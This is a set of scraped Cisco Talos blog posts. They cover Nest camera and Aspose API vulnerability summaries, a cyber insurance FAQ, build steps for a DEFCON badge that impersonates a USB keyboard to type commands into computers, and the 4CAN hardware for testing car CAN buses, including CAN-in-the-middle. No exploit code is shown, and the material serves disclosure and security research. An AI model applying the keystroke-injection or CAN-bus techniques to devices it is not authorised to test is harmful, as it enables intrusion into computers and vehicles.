An exploitable denial-of-service vulnerability exists in the Weave certificate loading functionality of the Nest Cam IQ Indoor camera, version 4620002. A specially crafted weave packet can cause an integer overflow and an out-of-bounds read to occur on unmapped memory, resulting in a denial of service. An attacker can send a specially crafted packet to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Nest Labs Openweave Weave tool Print-TLV code execution vulnerability (TALOS-2018-0801/CVE-2019-5038)

An exploitable command execution vulnerability exists in the print-tlv command of Weave tool. A specially crafted weave TLV can trigger a stack-based buffer overflow, resulting in code execution. An attacker can trigger this vulnerability by convincing the user to open a specially crafted Weave command.

Read the complete vulnerability advisory here for additional information.

Nest Labs Openweave Weave ASN1Writer PutValue code execution vulnerability (TALOS-2018-0802/CVE-2019-5039)

An exploitable command execution vulnerability exists in the ASN1 certificate writing functionality of Openweave-core, version 4.0.2. A specially crafted weave certificate can trigger a heap-based buffer overflow, resulting in code execution. An attacker can exploit this vulnerability by tricking the user into opening a specially crafted Weave.

Read the complete vulnerability advisory here for additional information.

Nest Labs Openweave Weave DecodeMessageWithLength information disclosure vulnerability (TALOS-2018-0803/CVE-2019-5040)

An exploitable information disclosure vulnerability exists in the Weave MessageLayer parsing of Openweave-core, version 4.0.2 and the Nest Cam IQ Indoor, version 4620002. A specially crafted weave packet can cause an integer overflow to occur, resulting in PacketBuffer data reuse. An attacker can send a packet to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that version 4620002 of the Nest Labs IQ Indoor camera is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 49843 - 49855, 49797, 49798, 49801 - 49804, 49856, 49857, 49813 - 49816, 49912

What you — and your company — should know about cyber insurance

$
0
0

By Jon Munshaw and Joe Marshall. 

It’s no longer a question of “if” any given company or organization is going to hit with a cyber attack — it’s when. And when that attack comes, who is willing to take on that risk?

For some groups, it may be that they feel they are fully prepared to take on the challenge of defending against an attack or potentially recover from one. But cyber security insurance offers the ability to transfer that risk to an insurance company that can help you with everything from covering lost revenue to providing incident response as soon as you detect an attack.

Even back in 2016, Cisco Talos called the realm of cyber insurance “new and immature.”  But since then, the market has changed drastically, and these kinds of policies are becoming more popular. Still, some businesses have been slow to adopt these policies. According to a study by J.D. Power & Associates and the Insurance Information Institute released in October 2018, 59 percent of businesses still do not have any form of cyber insurance.

But a recent wave of attacks — including the takedown of computer systems in Baltimore, a multi-million-dollar settlement from Equifax over a 2016 data breach, and the recent theft of millions of Captial One customers’ information— shows why it’s important to remain prepared for these kinds of scenarios.

Equifax is still recovering from a massive data breach in 2016 that cost the company hundreds of millions of dollars. A cyber policy the company had covered $125 million in costs associated with the attack, though Equifax admittedly could have used a bigger policy considering the breach cost a total of $1.4 billion.

Is cyber insurance the right choice for your company or organization? We spoke to two cyber insurance experts to get answers to the questions we had around cyber insurance to help you make an informed decision.

How similar is cyber insurance to the insurance we’re all used to (health, car, etc.)? 

Turns out, not very. Catherine Rudo, the vice president of cyber insurance at Nationwide, said handing out cyber insurance policies is nothing like other, more conventional policies. Rudo agreed to speak with Talos regarding security policies across the board and said her comments do not reflect the traditional Nationwide policy.

“If you compare cyber to property [insurance], I don’t think there’s a direct comparison,” she said. “Cyber stands on its own. It’s something that’s closer to a liability policy … not everyone needs it in the same way, but everyone needs it.”

Rather than the plug-in and play model of other policies like car insurance, where you’d put in the specific make, model, year and amount of coverage needed for your car, and the insurer spits out a quote, each cyber policy is going to be different.

Rudo said each policy must be assessed and written on a case-by-case basis. There’s a wide variety of factors that need to be considered, including intellectual property, potential extortion payments, liability coverage, etc.

For example, the risks inherent with a cyber policy for an electric company would be entirely different than a clothing store that collects point-of-sale payments.

What do insurers do to calculate initial risk in these policies? 

For an insurance company to underwrite a policy for a company, organization or even government entity, the insurer must evaluate several different areas of security risk.

For example, Rudo said that on most cyber insurance applications, the potential insured must answer questions about patching cadence, the number of endpoints that access their network, what (if any) firewalls are in place and what third-party vendors the company works with.

Leslie Lamb, Cisco’s head of risk management, knows firsthand what the application process is like.

Lamb has been a part of every cyber insurance policy Cisco has ever purchased, and said every year, they reassess the policy and always try to get additional coverage in some form or another. She said Cisco’s CISO, Steve Martino, has met with insurance underwriters every year to discuss what Cisco does to limit exposure to attackers, what new intelligence partnerships are in place and how the company mitigates risk.

“We essentially do a roadshow for them,” Lamb said, adding that the process usually starts about 120 days prior to the expiration of Cisco’s current policy.

There’s also the inherent risk that comes with certain industries. For example, public institutions may have a more expensive policy because they handle a large amount of intellectual property, making them a more enticing target.

There’s also the issue of the size of the business — obviously, larger companies are going to be targeted more often than a mom-and-pop corner store.

Rudo said that the premiums may even increase if the potential insured has a higher appetite for risk than another company or organization.

How long have cyber policies been around? 

Lamb says a common misconception is that cyber insurance policies have only been around for a few years, when in fact, they’ve existed for about 15 years, even dating back to the Y2K scare.

But Lamb said the popularity of the market has increased dramatically over the past five years.

“It has grown exponentially because of the things that have been happening,” she said. “People are aware of what’s going on...no one is immune to having a cyber incident.”

Lamb said many multi-national companies have had cyber insurance policies as long as they’ve been around, but middle-market companies are just starting to pick up on the trend now.

Are there limits to how much a policy may pay out for one attack alone? 

This will vary from policy to policy, but most of the time, yes.

Rudo said companies seeking out cyber insurance policies will shop around between companies looking for which insurer can offer them a larger “policy aggregate,” meaning the total amount the policy will cover.

Another option could be to take out a policy covering a certain number of records that could be stolen in an attack.

“There are some policies that have a limit for how much they’ll spend, but they’ll have a number of records,” she said. “Some policies will say they’ll give ‘X’ million for your data breach, and another may say they’ll cover ‘X’ number of records. These policies don’t tabulate the amount, just the number of records taken.”

What happens after you’re attacked? 

Bad news — you’ve been attacked and are now infected with ransomware. Good news, you purchased a cyber insurance policy.

This varies from policy to policy, but some insurance companies will even go as far to provide boots-on-the-ground incident response and forensic assistance to help you recover your data and restore operations as quickly as possible.

Here’s why that makes sense for the insurer: If they can help you recover your data, the damages realized will not be as severe and thus reducing the monetary amount of claim and the restoration of activity to the victim as quickly as possible.

In some cases, the insurer will act as an intermediary between the attacker and the victim to help pay the ransom if that’s the route the victim wants to take.

“If a customer chooses to pay the ransomware, the insurance company will pay it, and the insurance company will sometimes facilitate [the payment],” Rudo said. “They can access a vendor to help with the ransomware payment. An insurance company will also respect the wish of the client if they choose not to pay the ransom.”

For example, an insurance company can even assist the victim in converting traditional currency into cryptocurrency, which the attacker may request as payment.

To hear Talos’ take on whether to pay the ransom in these kinds of attacks, you can check out our roundtable here.

Once the insured has completely recovered from an attack, the insurer will usually re-evaluate the policy and premium. The insurance company will look at things like if the initial attack vector was remediated, if the attacker was completely eradicated from the system and what new protections may be in place post-infection.

What is the timeframe for which the policy will cover an attack? For example, what would happen if an attacker had been in a victim’s system for a year, but the insured only took out a policy six months ago? 

These policies pay out on discovery. So, for example, if a retailer had a card-skimming malware sitting on their system since January, but the company only took out a policy in October, the attack would still be covered if they discovered the breach in November of that same year.

“These policies are on a discovery basis,” Rudo said. “The policy begins when the buyer has discovered the loss. The only way there might be an exclusion is if there’s a retroactive date [on the policy].”

What is Cisco’s role in all of this? 

Last year, Cisco, Aon, Apple and insurance company Allianz collaborated to launch the industry’s first cyber risk management solution.

The solution combines cyber resilience evaluation services from Aon, technology from Cisco and Apple, and options for enhanced cyber insurance coverage from Allianz.  “Enhancements” to the traditional insurance policy that this program offers, may include severance pay for CISO’s in the event of a termination after a breach, special support agreements if the insured uses a certain percentage of Apple products and a shorter waiting time for coverage to kick in, according to Lamb.

Organizations using Cisco Ransomware Defense are eligible for such enhancements from Allianz.

Other considerations 

  • Rudo said intellectual property is generally not covered by security policies because it is too difficult to quantify. 
  • There are other liability policies that may be available to cover attacks that cause harm to a third party. For example, if an internet-of-things device was hacked in a way that it malfunctioned and injured a user, a cyber insurance policy would generally not cover that, but a separate liability policy would. 
  • Many insurance companies will have “cyber security panels” that step in during some attacks to aid and provide advice to the victim. Lamb said Cisco is currently part of a few of these types of panels, and is looking to join more. 

Vulnerability Spotlight: Multiple vulnerabilities in Aspose APIs

$
0
0

Cory Duplantis and Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities.

Cisco Talos recently discovered multiple remote code execution vulnerabilities in various Aspose APIs. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs, Microsoft Word files and more. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API.

In accordance with Cisco's disclosure policy, Talos is disclosing these vulnerabilities after numerous unsuccessful attempts were made to contact Aspose to report these vulnerabilities.

Vulnerability details

Aspose Aspose.Cells LabelSst remote code execution vulnerability (TALOS-2019-0794/CVE-2019-5032)

An exploitable out-of-bounds read vulnerability exists in the LabelSst record parser of Aspose Aspose.Cells 19.1.0 library. A specially crafted XLS file can cause an out-of-bounds read, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information. 

Aspose Aspose.Cells number remote code execution vulnerability (TALOS-2019-0795/CVE-2019-5033)

An exploitable out-of-bounds read vulnerability exists in the Number record parser of Aspose Aspose.Cells 19.1.0 library. A specially crafted XLS file can cause an out-of-bounds read, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information. 

Aspose Aspose.Words EnumMetaInfo code execution vulnerability (TALOS-2019-0805/CVE-2019-5041)

An exploitable stack-based buffer overflow vulnerability exists in the EnumMetaInfo function of Aspose Aspose.Words library, version 18.11.0.0. A specially crafted doc file can cause a stack-based buffer overflow, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information. 

Versions tested

CVE-2019-5033 and CVE-2019-5034 affect Aspose.Cells, version 19.1.0. CVE-2019-5041 affects Aspose.Words, version 18.11.0.0.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 49756, 49757, 49760, 49761, 49852, 49853

Talos DEFCON badge build instructions and use

$
0
0

By Patrick Mullen.

We want to thank everyone who stopped by the Cisco Talos booth at DEFCON's Blue Team Village earlier this month. We handed out these badges at our area where we had Snort rules challenges, reverse-Capture the Flag and recruiters ready to answer attendees' career advice questions.

Unfortunately, there were two bugs in the board as created, which should be expected when it was created in such a short time, but we have a guide for how you can fix these. Once these bugs are fixed, you'll have a fully functional Digispark clone that can be used for several projects, including impersonating a USB keyboard, as our example sketch does. You can also attach leads to the open jumpers to get full access to all of the pins from the ATtiny85 to drive your own projects.

Power is provided directly by the USB port when used as a USB device, by a USB charger, or via J2 at the top of the board. The center pin is GND, the right pin is for regulated for five volts, or the left pin can handle anywhere from 5V to 20V. During Defcon, we powered it with a nine-volt battery for convenience.

The first bug is really easy — diode D1 on the lower right of the board has the line indicating the direction for the cathode on the wrong end due to using a faulty schematic.

The second bug took a bit more creativity to overcome, but the actual assembly isn’t too difficult and makes the build that much more fun. The issue is that the schematic for the USB port was rotated, so we need to tweak the circuit so everything connects to the right place. I think the end result adds character to the badge and is quite effective.

Tools needed:
  • Small straight slot (flat head) screwdriver
  • Soldering iron with a small tip
  • Solder
  • Small wire cutters
  • Small needle-nose pliers are helpful
  • Multimeter, or at least a continuity tester (beeps when two connections are attached)
  • A magnifying glass can be useful to check your work
  • Arduino IDE for programming the chip
              Parts list:
              • ATtiny85 w/ Digispark bootloader. Bootloader is needed for programming over USB
              • 8 pin DIP chip holder
              • 5V power regulator
              • Through-hole mini USB connector
              • (2) 3.6V zener diodes
              • (1) Schottky diode
              • (2) 75 ohm resistors (or 100 ohm or 66.5 ohm as in schematic)
              • (1) 1.5k ohm resistor
              • (2) 330 ohm resistors
              • (2) LEDs
              • (1) 0.1 uF capacitor
              • (1) 4.7 uF capacitor
              For reference, this is the board schematic. Note this schematic has the diode from USB 5V pin to the 5V rail upside down. The line indicating the cathode should be pointing up toward the 5V rail, not toward the USB port. But other than that, this is the best schematic I’ve found and is released under the creative commons license.



              Prepare the board

              To rewire the USB port in a way that is easier to build the board, we are going to have to cut one of the lines on the board.  If you want to be fancy, you can do this by drilling through the board, but scratching through the conductor (“line/wire”) with a straight slot screwdriver is more than sufficient.

              Be careful to not hit one of the other lines and if you have a continuity tester (or a multimeter set on resistance and verify infinite resistance aka open connection), it’s always good to verify you’ve done so successfully and completely.

              The line we want to cut (viewed from the back of the board) starts from the bottom-most connector of the USB jack, but cut it *after* the connection hole, before the ‘T’ junction.  See the photo since I’m not getting paid by the word and don’t want to write a thousand of them.  Note the multimeter is demonstrating there is no connection between the pin on the USB connector and that connection point on the board after our “cut.”


              Prepare the USB connector

              Thankfully, one of the USB connections is not used and this allows us to modify the jack to get rid of the unused pin and then create a bridge on the board to bring the pin that is used over to the circuit where it was originally supposed to be connected.

              To remove the unused pin, flip the USB connector over so the pins are on top and the “open-end” is to the left. The pin you want to remove is the top left one.

              I had great success by using the small straight slot screwdriver to bend the pin toward the “back” of the connector (to the right in the photo), then using needle-nose pliers to wiggle it back and forth until it broke off cleanly.



              Solder on the USB connector

              NOTE: We are going to need to bridge a connector here and to keep everything you need within the kit, we’re going to use part of a lead from one of the components.
              1. Put the USB connector into the holes from the front side of the board and flip the board over.  You can use the power regulator (the black component with the metal fin) to keep the board level while you solder.
              2. Solder the two positioning holes on the left to keep the connector from moving while soldering the pins.
              3. Put one of the legs of the burnt orange / brown capacitor into the hole on the left with the pin sticking through it. Again, a picture helps here. All we are doing here is using a bit of that nice, thin wire from the capacitor to bridge between the two connectors on the left.
              4. Solder all FOUR of the pins from the USB connector. DO NOT SOLDER THE EMPTY HOLE. These pins and these holes are really small.  Now would be a good time to clean your soldering tip and make sure you don’t use too much solder and bridge connections.
              5. Cut the leg that you soldered into the hole about halfway up the leg. You don’t need much of the leg to go through the board when you solder the capacitor into the circuit, and you only need enough to reach to the open connection on the USB port.
              6. Bend the cut leg over to the open connector, lay it across the connector being careful not to short any others, and solder it in place. Using your screwdriver can provide extra leverage and precision to bend the bridge all the way to the board.









              Soldering on the "normal parts"

              You can now solder on all components except the three diodes. The diodes are the “glass-looking” red things with the black line and the black with silver line component.

              Notes for assembly — be aware that some parts are unidirectional.
              1. The LEDs are unidirectional. The long leg goes through the hole with the square contact around it. NOTE: The two LEDs have square contact on opposite sides. 
              2. The yellow capacitor is unidirectional. The long leg goes toward the "+" toward the bottom of the board. The burnt orange/brown capacitor can go in either way. The capacitors are connected in parallel, so it doesn’t matter which goes into the C1 or C2 connection.
              3. R4 and R5, near the power regulator, are 330 ohms. In the kit, they are the fat resistors with orange-orange-brown stripes. Note the gold stripe on the resistors refer to the tolerance/"quality" of the resistor and doesn't really matter for this circuit.
              4. R3 and R1, the top two resistors below the USB connector, are 75 ohms, with purple-green-black stripes. If your kit does not include these resistors (we bought every 75 ohm resistor at Fry's in Las Vegas), 100 ohms is a common size that will also work.  
              5. R2, the bottom resistor on the right side, is 1.5k ohms and has brown-green-red stripes. 
              6. The big blue resistors in the kits are not used. They were supposed to be 66.5 ohms. They are 66.5 *thousand* ohms. Oops.
              7. The chip connector has a notch on it that lines up with the break in the silkscreen to the right.  This is used to indicate pin 1 on the chip. Do not have the chip in the socket while soldering it in place. Do not forget to trim the ends of the leads off after soldering.
              8. The power regulator (the black thing with the metal fin) has a line on the board on the left side that indicates where the cooling fin goes. When connecting this component, I find that leaning it to the right when soldering it on will give you a little extra room to bend it over to the left so it’ll lie flat when finished.

              Soldering on "funky bits"

              Now, we need to reverse the 5V and GND circuits. I think steps 1 and 2 below make more sense if you see what the circuit will look like before reading it, so this is what you should have after step 2:

              1. Take one of the zener diodes (the little glass-looking things with the red underneath and the black stripe).  The black stripe lines up with the stripe on the circuit board printing.  But, because this is the “funky” section, we’re going to connect it “weird.”
                1. Insert the zener diode into the *left* diode slot, U3, but stick it in so it points straight up, with the black line down against the board.
                2. Solder it in the straight-up position.
                3. When you cut the lead on the back of the board, SAVE THE CLIPPING.  We’ll need it in a moment.
                4. Leave the diode in this position for now.
              2. Take the other zener diode, and bend the end with the black stripe as if you were going to mount it normally, but leave the other leg straight.
                1. Insert it into the top connector of U2 (so the stripes match) but angle it to the left so it crosses the U3 silk screening before you solder it on.
                2. You may find that with the other components on the board, and the relative sizes of the wire and the hole, that it’s easier to solder this component from the top if you leave yourself room after the bend.  Cut off the extra in the back of the board and solder from the back for a good connection if necessary.
                3. Bend the loose leg of U2 so it goes around the bottom hole of U3 and across the top of the chip holder.  This is easier with needle-nose pliers.  We will be soldering this leg to the bottom leg of U3, so don’t worry about keeping a distance from the wire.

              Connect the zener diodes together

              1. Returning to U3 (the zener diode on the left), bend the remaining wire forward, through the bottom hole for the diode, and solder it into place.  Using needle-nose pliers to make the bend and insertion may make it easier.  Be gentle so you don’t snap the diode in half.  There’s no reason to get this too tight and risk breaking the component.
                1. Solder the bottom leg of U2 to the bent leg of U3. Don’t forget to make sure that U3 is soldered into the board as described in the previous step.
              2. Connect the zener diodes to GND
                1. Solder the leg you removed from U3 into the top connector for D1, with the leg sticking straight up out of the board.  We are going to bend it so we can connect it to the tail of U2 (which has been bent around the bottom wire from U3).
                2. Bend the leg up to meet the long lower leg from U2 and solder them together.  You should now have a connection from the top of D1 to both diodes, at the bottom of U3.
              3. Solder the schottky (black w/ silver stripe) diode
                1. For this one, the silkscreen is backward because the schematic I was using had this diode backward, so ignore the marking on the board. We are using the long legs of this diode to make a long connection to fix the circuit without needing additional wire. With the fix, the proper connection is for the end with the silver stripe to connect to the bottom of D1 and the other end to connect to the bottom of U2.  Feel free to tuck this in as much as you can, but make sure you are clear of any wires touching.  If you’re feeling particularly frisky, you can use the diode itself as an insulator against the connector for U2 that goes around the chip carrier, or some electrical tape.
              4. Insert the chip
                1. There is a little dot on top that indicates pin 1. That goes toward the end of the chip carrier with the indent (to the right of the board).
                This is what the completed circuit should look like:

                Programming the board

                I'm going to outsource the programming of the board now to this YouTube tutorial. Remember, this board uses the ATtiny85 chip and is a Digispark clone. If you have any issues, search for those names online and you should get what you need.

                Everywhere the creator of this video says “Digispark board,” hear “Talos Defcon 27 Blue Team Village badge” because they are the same.
                1. Open the Arduino IDE and load the Digispark board managers (1:48 in the video).
                2. Load the drivers (3:54 in the video).  Hopefully, with our board and the bootloader we have installed, this step will be easier for you.  He provides information and links if you have troubles.
                3. Load the Arduino IDE (7:24 in the video).  If you want to do the blink sketch he talks about, you’re welcome to do so.  Or just go right to the excitement and do the next step instead!
                4. Copy and paste this sketch
                Now you can upload the program. Don’t forget to unplug the badge (if necessary) and plug it in when the IDE tells you to (as described at 9:07 in the video).

                Now that your badge is programmed, you no longer need the Arduino IDE or drivers to control other computers. Just plug it in, wait five seconds while the board initially identifies itself as an Arduino then disconnects and reconnects as a keyboard, and watch it do its thing.  LED1 is a status light as programmed in the sketch — it turns on when it starts typing and turns off when it’s completed all of its commands.

                If you want your badge to send different commands, change the lines that call the function type() and tell it to type something else. Please note that these chips have extremely tiny memories and unfortunately the DigiSpark library takes up a lot of room so you don’t have a ton of text you can type, but you do have a fair amount. If you look into trimming the installed size of the code you should be able to get more program onto the chip.

                Some other notes on the badge:

                • If you get female lead connectors and solder them to J1 and J2, you can use the ATtiny85 to do whatever you want, as long as you only need a few data lines and a small memory.  You can, of course, solder to the leads directly if you want, but by putting in female leads you can make a reusable circuit.  Note it is probably not a good idea to drive the data pins however you want while connected to a USB data cord.
                • J2 is for external power, so you can run the board while not connected to USB.  The middle connector is ground.  The connector on the right is for 5V *only*.  The connector on the left can run 5V-20V DC.
                • You can also power the circuit using a USB charging cable, but as stated above, it’s not recommended to be connected to the computer USB data port if you’re running a sketch that is not specifically for driving USB data, like a keyboard.
                • You can program it either through the USB as you did above or by using something like an Arduino UNO as an ISP as described in this video.
                • If you want to change the bootloader (or if you get a stock ATtiny85 that doesn’t have the boot loader we installed on the ones in the kit), directions are in this video.
                We hope to continue and do other badges in the future, hopefully, next time without bugs! We hope everyone had a great time at Hacker Summer Camp and look forward to next year where we'll have all new challenges, badges and other fun things to poke at.

                  Article 1

                  $
                  0
                  0

                  New 4CAN tool helps identify vulnerabilities in on-board car computers


                  By Alex DeTrano, Jason Royes, and Matthew Valites.


                  Executive summary


                  Modern automobiles contain hundreds of sensors and mechanics that communicate via computers to understand their surrounding environment. Those components provide real-time information to drivers, connect the vehicle to a global network, and in some cases use that telemetry to automatically drive the vehicle. Like any computer, those in vehicles are susceptible to threats, such as vulnerabilities in software, abuse via physical-access, or even allowing remote control of the vehicle, as recently demonstrated byWired and a DARPA-funded team of researchers.

                  Allied Market Research estimates the global connected car market to exceed $225 billion by 2025. To help secure this emerging technology, Cisco has dedicated resources for automobile security. The Customer Experience Assessment & Penetration Team (CX APT) represents the integration of experts from the NDS, Neohapsis, and Portcullis acquisitions. This team provides a variety of security assessment and attack simulation services to customers around the globe (more infohere). CX APT specializes in identifying vulnerabilities in connected vehicle components.

                  During a recent engagement, the Connected Vehicle Security practice identified a gap in tooling for automobile security assessments. With ease-of-use, modern car computing requirements, and affordability as motivating factors, the Connected Vehicle Security practice has built and is open-sourcing a hardware tool called "4CAN" with accompanying software, for the benefit of all automobile security researchers. We hope 4CAN will give researchers and car manufacturers the ability to test their on-board computers for potential vulnerabilities, making the vehicles safer and more secure for drivers before they even leave the lot.


                  What does a car's network look like?


                  Before jumping into the 4CAN hardware module itself, let's start with some automobile basics. For a modern vehicle to operate effectively, its network of hundreds of sensors and computers must communicate with each other. While vehicles and components employ Wi-Fi, Bluetooth, and cellular communication protocols, the backbone of a vehicle's network is a Controller Area Network (CAN), also referred to as the "CAN bus."


                  Access to the CAN bus from a physical perspective is typically via an ODB2 connector, often located on the driver-side lower dash, though it can sometimes also be accessed by removing side mirrors or external lights. Compromising the CAN bus can lead to total control of the vehicle, making it a prime target for pen testers and malicious attackers. Often, attacks against peripheral components such as Wi-Fi or LTE are ultimately an attempt to gain access to the CAN bus.


                  CAN Bus background


                  A typical vehicle's CAN bus is shown below. In a secure configuration, the critical components such as airbags and brakes communicate on separate CAN buses from the non-critical components, such as the radio or interior lights. Pen testers and attackers with access to the CAN bus test for this separation of services looking for insecurely configured vehicles.


                  The CAN bus is a two-wire multi-master serial bus. Each device connected to the CAN bus is called a "node" or Electronic Control Unit (ECU). When a device sends out a message, or CAN frame, that message is broadcast to the CAN bus and received by every node. When two nodes broadcast a CAN frame at the same time, the arbitration ID, a type of unique node identifier on every CAN frame, determines message priority. The CAN frame with the lower arbitration ID takes priority over the higher arbitration ID.

                  Electrically, the CAN bus uses differential signaling as a means to reduce noise and interference. There is CAN-HI and a CAN-LO signal, and the two signals are inverse from each other. The bus also has a 120 ohm characteristic bus impedance. When performing a CAN-in-the-middle, the bus must be terminated with a 120 ohm resistor. The image shown below is fromWikipedia, which has an excellent overview of the CAN bus if you're interested in more detailed information.


                  Single CAN bus with multiple nodes


                  The simplest implementation of an automobile's network uses a single CAN bus. An example with 3 nodes is shown below. All connected nodes will see every CAN message published to the CAN bus. There is no ability to separate critical from non-critical nodes.


                  Multiple CAN buses with a gateway


                  A typical vehicle setup has multiple CAN buses combined with a gateway to arbitrate access between the CAN buses. This gateway acts as a firewall and can check CAN IDs to determine if the message should be allowed to traverse CAN buses. In this way, critical ECUs can be isolated from non-critical ECUs.




                  The vehicles that we have been testing have 4 CAN buses inside, all of which are connected to the gateway. The architecture looks something like this:


                  The security of each ECU on the bus is partly dependent on the gateway's ability to segregate traffic. Testing the gateway involves sending and looking for messages allowed to traverse disparate CAN buses. On four-bus systems, this test requires pen testers can access the four buses simultaneously.


                  Existing solutions


                  Several devices exist that allow testing of the CAN bus. Most of the devices use theMCP2515 CAN controller, which provides a serial peripheral interface (SPI) to connect with a microcontroller, and aMCP2551 CAN Transceiver orNXP TJA1050 CAN Transceiver, which generates and receives the electrical signals on the physical CAN bus. This table describes some of the CAN hacking solutions currently available on the market.


                  Each device has its pros and cons, but none completely met our needs of being easy to use, allowing access four buses, and doing so at an affordable price point. Here's how the currently available devices align with our needs.

                  In the absence of a compatible device we set out to solve this problem, doing so with the following technical motivators:

                  • Raspberry Pi compatible
                  • Easily enable or disable 120 ohm bus terminating resistors
                  • Natively supported by SocketCAN for easy Linux integration
                  • Inexpensive


                  Our Solution


                  We call the solution "4CAN," and designed it with the following goals in mind:

                  • Validating communication policy for intra-CAN bus communication.
                  • Fuzzing (sending randomized payloads) to components to identify vulnerabilities.
                  • Exploring the CAN commands used to control/interact with the vehicle.
                  • Simplify our testbench setup to keep everything organized and in sync.

                  Design

                  George Tarnovsky, a member of CX APT, is the originator or the 4CAN's design. The Raspberry Pi contains five hardware SPI channels so we decided to use the MCP2515 CAN Controller since it could interface with the Pi via SPI. We added a four-port DIP switch instead of physical jumpers or a solder bridge to easily enable the 120 ohm bus terminating resistors. The MCP2551 CAN transceiver was used as the CAN transceiver.

                  The high-level design is described in the below schematic, the more detailed version of which can be found here.



                  PCB layout

                  To be as compatible as possible, we aimed to conform to theRaspberry Pi HAT specification as closely as possible. The HAT spec limits the hardware dimensions, requiring us to use creative solutions to pack all the components on the board. Since we did not include an EEPROM and did not leave a cutout for the camera connector, the module is not HAT compliant per spec. These were conscious design decisions, since we will not be using a camera add-on and do not make use of the EEPROM.

                  All components are surface mounted, using the smallest component sizes we could find to minimize space on the board. The only exception to using the smallest components is the USB-UART connection. Instead of adding all the components ourselves, we went with a premade board containing all the circuitry. This board sits on top of the 4CAN. A resistor pack further reduces part-count and has a smaller footprint than four individual resistors. Rather than drive all four CAN controllers with individual crystal oscillators, we opted to use just one. This can introduce clock skew, because each component receives the clock in serial, rather than in parallel at the same time. To limit the effect of clock skew, we kept the clock lines as short as possible. In order to keep costs down, we used a 2-layer PCB design. While this limits routing options, the cost is significantly cheaper than a board with more layers. We also added the standard 40-pin GPIO header, so that the remaining GPIO can be used.

                  The final layout is shown below.





                  Before and after


                  Before


                  In order to test four CAN buses simultaneously, we required three CAN devices. Two TT3201 three-channel CAN Capes attached to Beaglebones, and one CanBerryDual attached to a Raspberry Pi. We also have another Raspberry Pi to remotely control the test vehicle. With this configuration, we can test sending CAN frames between any two combinations of CAN channels. Although this setup works, it is a bit unwieldy, requiring lots of wires making connection tracking and test aggregation difficult.


                  After


                  Using 4CAN, the test bench setup is vastly simplified. With a single Raspberry Pi, we can simultaneously test four CAN channels, and since the 4CAN exposes the entire 40-pin GPIO header, we can remotely control the test vehicle.




                  The simplicity of using 4CAN is easily observable on the physical test bench.

                  Before 4CAN:
                  Using 4CAN:

                  Usage


                  For the 4CAN to communicate with the Raspberry Pi, the Pi must be configured with four SPI channels enabled and tied to specific GPIO pins. Additionally the Pi's linux kernel requires additional drivers such as SocketCAN, which implements the CAN device drivers as network interfaces. From a user-space perspective,can-utils loads the SocketCAN drivers and provides capabilities to sniff CAN traffic, send CAN messages, replay captured CAN traffic, implement a CAN gateway to facilitate CAN-in-the-middle, and more.

                  CAN-in-the-Middle


                  To determine whether an ECU is sending or receiving a message or to modify CAN traffic in-flight, the 4CAN can be inserted between the CAN bus and an ECU to capture or possibly modify the traffic, to perform a CAN-in-the-Middle (CITM) attack. The required bridging can be enabled by combining can-util's 'cangw' command and ascript we have provided.

                  Sniffing Inter-CAN communication


                  The 4CAN allows us to test inter-CAN communication by sending a CAN message with a known payload on one CAN bus, and seeing if that same message appears on a different CAN bus. Doing so allows us to learn whether and how the CAN gateway is filtering or modifying messages. In some instances we have observed the CAN ID change for the same message across different buses. We provide ascript to facilitate this "transcan" testing.

                  Tool Release


                  The 4CAN is available on GitHub here.

                  Threat Source newsletter (Aug. 22)

                  $
                  0
                  0

                  Newsletter compiled by Jon Munshaw.

                  Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                  A lot of people may think that cyber insurance is this new, unexplored field that carries a lot of questions. But did you know that these policies have actually been around since Y2K fever? There are many more misconceptions about these policies, so we aimed to clear some of these up with this cyber insurance FAQ.

                  If you came out and saw us at DEFCON, chances are you got your hands on our super sweet badges. Unfortunately, there were a few small bugs, but we have a step-by-step guide that shows you how to fix those problems, and we walk through how to set it up to get your own Digispark clone.

                  This was also a busy week for vulnerabilities. Our discovery of several bugs in Google’s Nest camera has made headlines, since an attacker could use these to leak sensitive information. We also have a breakdown of multiple remote code execution vulnerabilities in different Aspose APIs.

                  We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

                  Upcoming public engagements with Talos

                  Event: “DNS on Fire” at Virus Bulletin 2019
                  Location: Novotel London West hotel, London, U.K.
                  Date: Oct. 2 - 4
                  Speaker: Warren Mercer and Paul Rascagneres
                  Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

                  Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
                  Location: Metro Toronto Convention Center, Toronto, Canada
                  Date: Oct. 7 - 10
                  Speaker: Edmund Brumaghin and Earl Carter
                  Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                  Cyber Security Week in Review

